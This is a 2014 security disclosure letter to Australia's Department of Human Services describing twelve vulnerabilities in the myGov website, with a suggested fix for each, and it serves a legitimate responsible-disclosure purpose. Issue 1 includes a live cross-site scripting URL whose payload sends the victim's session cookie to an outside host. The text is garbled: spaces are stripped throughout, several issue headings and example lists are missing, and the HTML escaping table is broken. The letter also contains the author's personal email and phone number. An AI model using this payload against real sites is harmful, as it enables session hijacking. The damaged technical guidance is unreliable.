Professional Documents
Culture Documents
Australian Mygov Security Issues
Australian Mygov Security Issues
nikcub@gmail.com
+61435177210
Friday2ndofMay2014
To: InformationSecurityContact
DepartmentofHumanServices
Cc: DepartmentofFinance
OfficeofAustralianInformationCommissioner
Re: URGENTSecurityissuesonmyGovwebsite
MynameisNikCubrilovicandIamanindependentsecurityconsultantandpenetrationtester.Iam
writingtoyoutoreportnumeroussecurityissueswiththemyGovwebsite.Themostseriousof
thesesecurityvulnerabilitieswouldallowanattackertohijacktheaccountofanyregisteredmyGov
user.
Ifoundtheseissuesafterconductingaverybasicsecuritytestofthewebsiteafterreadingthe
storybyBenGrubbaboutmyGovintheSydneyMorningHeraldonMonday:
Australiansprivategovernmentdetailsatthemercyofhackers,sayITsecurityexpertspublished
onthe28thofApril2014:
http://www.smh.com.au/itpro/governmentit/australiansprivategovernmentdetailsatmercyofha
ckerssayitsecurityexperts20140428zqzkg.html
Pleaseseethatthedetailsofthisreportareroutedtotherightpeoplewhowouldbeabletobring
urgentattentiontogettingtheseissuesfixed.IwasunabletofindasecuritycontactonthemyGov
ordepartmentwebsite.
Pleasefindthedetailsofeachissuebelow,feelfreetocontactmeonemailorphonenumberlisted
above.
NotethatIhaveonlytestedthepublicinterfacesofthemyGovwebsite,andhavenotcarriedout
anexhaustivepenetrationtestoftheservice.Theissuesfoundwithonlythepublicinterfaceleads
metoconcludethattherearelikelymoresimilarissueswiththeservice.
ThemostseriousoftheseissuesallowanattackertohijacktheaccountofanymyGovuser.Ihave
successfullycarriedoutthisattackagainstmyownmyGovaccountusingtwocomputers.
Issue 1: CrossSite Scripting Vulnerabilities in Enrollment Service
TheURLathttps://my.gov.au/EnrolService/enrolService.htmcontainstwocrosssite
scriptingvulnerabilities.TheURLqueryparameters_flowExecutionKeyand_flowIdbothdo
notfiltertheirvaluesandpassthemintotheoutputunalteredandunsanitised.Thismeansthatan
attackercaninjectJavascriptintotheparameterandhaveitexecutedwithinthecontextofausers
myGovsession.Thiscanleadtocapturingkeystrokes,dataorhijackingauserssessionby
capturingtheircookie.
HereisanexampleexploitURL(WARNING:Thisisaliveattack):
https://my.gov.au/EnrolService/enrolService.htm?_flowId=enrolmentmgflow&_flo
wExecutionKey=e2s13f652%3cimg%20src%3da%20onerror%3d%22$.post('http://s03.do.n
ikcub.com/get.php',document.cookie)%22%3e24aae26396
Thisvulnerabilitycanbeexecutedinthebackgroundofanotherpage,orinanIFRAME.This
exploitcanworkonallbrowserandacrossallplatforms.
HereisascreenshotofmybrowserexecutingmyownJavascriptonthemyGovwebsite:
Recommendation:Userinputshouldbefilteredandpreferablywhitelisted.Anyoutputthatis
meanttoberenderedonanHTMLpageshouldbeescaped(HTMLencodedcharacter
references).Examples:
Character EscapedOutput
"
< %lt
> >
& &
"
Aservercrashingonunexpectedinputisindicativeofimproperinputhandling,whichoftenleadsto
SQLinjectionandcrosssitescriptingattacks(asseeninIssue1).
Thenumberofpagesandparametersthatcrashonimproperinputaretoolongtolisthere,but
someexamplesare:
Recommendation:Userinputshouldbethoroughlyfiltered,sanitizedandthenvalidated.Improper
inputhandlingisthecauseofmostcommonsecurityissueswithwebapplications,andoftenlead
tobugsthatarebotheasytodiscoverandeasytoexploit.
Inthe/LoginServices/Authenticate.doURLanyparameternameisinjectable.Thisis
identifiedbylookingatthedifferentresponsestotwoSQLqueries:onewhichreturnstrueand
anotherwhichreturnsfalse.Examples:
ThereareotherURLsthatalsogiveouteitherservererrorsorvaryingresponsestodifferent
true/falseSQLcombinations,whichisindicativeofanSQLinjection.
Recommendation:Aswiththeaboveexamples,thisisaresultofinputfiltering.Alluserinput
shouldbefiltered,sanitizedandthenvalidated.
Issue 4: Sessions are incorrectly expired
ThemyGovwebsitessetsnumerouscookiesintheuserbrowserforsessionmanagement.The
primarycookieusedtoauthenticatetheuserissetasasessionbasedcookie,whichmeansthe
cookieremainsvalidaslongastheuserhasnotrestartedtheirbrowser.
Insteadofusingthecookiestandardtoexpirethesession,themyGovapplicationrunsaJavascript
functionthatcheckstheusersinactivitytimeandthenexpiresthecookieusingJavascript.Thisis
notthecorrectwaytoimplementshortlivedusersessions,norisittheindustryacceptedmethod
forimplementingshortlivedsessionswithasetexpirytime(inthiscase15minutes).
Thereasonwhythismethodofsessionexpirationisunsafeisbecauseanattackerusinga
techniquesuchasthecrosssitescriptingvulnerabilitydescribedinissue1isabletoalterthe
Javascriptandpreventtheexecutionoftheexpiryrouting.
Javascriptalsohasnoreliablemethodofexpiringcookies,andtherearemanywaysinwhichthe
expirationcanbeblockedorpreventedfromrunning(adblockingsoftware,theJavascriptsource
notbeingloadedcompletelythusnotexecuting,etc.)
Recommendation:Implementthesessionbysettingaproperexpirydateonthecookiewhichis
15minutesinthefuture.Thecookiewillthenbeexpiredusingthestandardmechanismbuiltinto
thebrowser,ratherthanacustomtechniqueimplementedinJavascript.
Themostcommonapplicationofsuchavulnerabilitywouldbewithusersconnectedviapublicwifi,
whereanattackeronthesamenetworkcouldmasqueradeastherouterandinterceptalltraffic
andactasaproxyinterceptingsensitivedata.
Recommendation:Setthesecurityflagoncookies.
Issue 6: No strict transport security set
Relatedtothesecurecookiesissue,themyGovwebsitedoesnotforcethebrowsertouseanSSL
connectionusingtheHTTPStrictTransportSecuritystandard.Thisallowsanattackeractingina
proxycapability(amaninthemiddleattack)tostripSSL.
ModernbrowserssupporttheHTTPStrictTransportSecuritystandard,whereuponafirst
connectionthebrowserwillrefusetoconnecttoawebsiteunlessitisbothoverSSLandtothe
serverwiththesamecertificatesignature
Recommendation:SettheStrictTransportSecurityheaderinallwebserverresponses.For
furtherdetailsseetheRFCfortheHSTSstandard,number6797athttp://tools.ietf.org/html/rfc6797
Issue 7: Cookies do not set the HttpOnly flag and can be read in Javascript
ThecookiessetbythemyGovwebsitedonotsetthesecureflag,whichmeansanexploitsuchas
thatdescribedinissue1,isabletoreadandhijacktheusersession.
Recommendation:SettheHttpOnlyflagoneachcookie.Cookiesonasecurewebapplication
shouldnotbeabletobereadbyJavascript.
Issue 8: Password authentication is susceptible to bruteforce attacks
TheloginmethodonmyGovdoesnotcontainaCAPTCHA,usedtodistinguishbetweenhuman
authenticationattemptsandattemptsfromabot.Theloginmethodalsodoesnotthrottlerequests
fromauser.Thecombinationofthesetwoissuesmeanthataprogramcanbewrittento
bruteforceattackuserpasswords.
Recommendation:ImplementaCAPTCHA.Implementthrottlingonuserauthenticationviaan
applicationlevelfirewall,orimplementasidechannelforauthentication(seeIssue10).
Issue 9: No bruteforce or robot protection on account linking
WhenamyGovuserlinksanaccount,itrequiresinformationsuchasausersfirstname,surname,
addressanddateofbirth.Theserverresponsesindicatetotheuserwhichfieldisnotmatchedand
ifthelinkdetails(suchasaMedicarenumber)arevalid.
Anattackerisabletobruteforcethesedetailsusingabotasthereisnohumancheck(CAPTCHA)
orthrottlingofrequests.
Recommendation:Asperpasswordauthentication,implementaCAPTCHAandapplicationlevel
requestthrottlingonaccountlinking.
Issue 10: No sidechannel authentication of user accounts
Relatedtothepreviousissueisthelackofasidechannelmethodofuserauthentication.The
authenticationtokensusedonregistrationofmyGovaccountsareausersname,surname,dateof
birthandforexampleamedicarenumber.Noneoftheseparametersaresecrets.
Thisleavesauthenticationsusceptibletoauthenticationattackswhereanattackercouldextract
theseauthenticationsecretsusingmethodssuchassocialengineeringorspearphishing.
Recommendation:Implementasidechannelforuserauthentication.Anexamplewouldbe
sendingauniquecodetoaverifiedmobilephonenumber,ortoaverifiedmailingaddressforthe
user.Thisuniquetokenwouldserveasproofofidentityintheauthenticationandauthorization
routing.
Issue 11: Frameable response (clickjacking)
AwebpagecontrolledbyanattackerisabletoloadthecontentofthemyGovwebapplication
withinaniframeonanotherpage.Thisenablesa"clickjacking"attack,inwhichtheattacker'spage
overlaysthetargetapplication'sinterfacewithadifferentinterfaceprovidedbytheattackerand
capturestheusersclicksorlogininformation.
Aframeablewebapplicationalsomeansthataspartofacrosssitescriptingattack(seeIssue#1)
theattackdoesnothavetosendthevictimadirectURLtomyGov,butmayinsteadloadtheexploit
URLinthebackgroundofanotherpage(suchasaforum,websiteoronanadnetwork)
Recommendation:TheservershouldsetasuitableXFrameOptionsheader(eg.SAMEORIGIN
whichwouldpreventthepagebeingframedonanothersite).
TheXFrameOptionsheaderisdescribedinRFC7034andissupportedbyallmajorbrowsers.
TheRFCcanbefoundathttp://tools.ietf.org/html/rfc7034
Issue 12: No security point of contact
UpondiscoveryoftheseissuesIattemptedtotrackdownasecuritypointofcontact.ThemyGov
websitedoesnotpublishacontactaddress,PGPkey(forsecurecommunication)ordetailsofa
disclosurepolicy.
Recommendation:AddadetailedsectiontothesecuritypageofthemyGovwebsitewhereusers
andsecurityresearcherscanreportsecurityissues.Includeacontactemailaddress,phone
number,PGPkeyanddetailsofthedisclosurepolicyforthewebsite.
Responsible Disclosure
Itismyintentiontomaketheseissuespublicatsomepointinthefuture.AsmyGovhasno
publishedresponsibledisclosurepolicy,wecanapplytheindustrystandard7daydisclosure
timeline.
SeeGooglesdisclosurepolicyasanexample:
http://googleonlinesecurity.blogspot.com.au/2013/05/disclosuretimelineforvulnerabilities.html
Iwouldconsiderthecrosssitescriptingvulnerabilitytobeacriticalissuethatrequiresurgent
attention.
Ifthedepartmentrequireslongerthan7daystofixthisissue,pleaseletmeknow.Iwouldalsoask
thatthedepartmentconfirmreceiptoftheseissuesandanyresponseassoonaspossible.
MyprimaryconcernisthesecurityofusersofthemyGovservice.Ithinkthereisahighprobability
thatthecrosssitescriptingvulnerability,orsomecombinationoftheotherissueshavebeen
exploitedinthewild.
Goodsecuritypracticeandpolicythrivesinanenvironmentoftransparencyanddisclosure,hence
myintentiontodetailtheissuesfoundonthemyGovwebsiteonmyblogoncetheyhavebeen
fixed.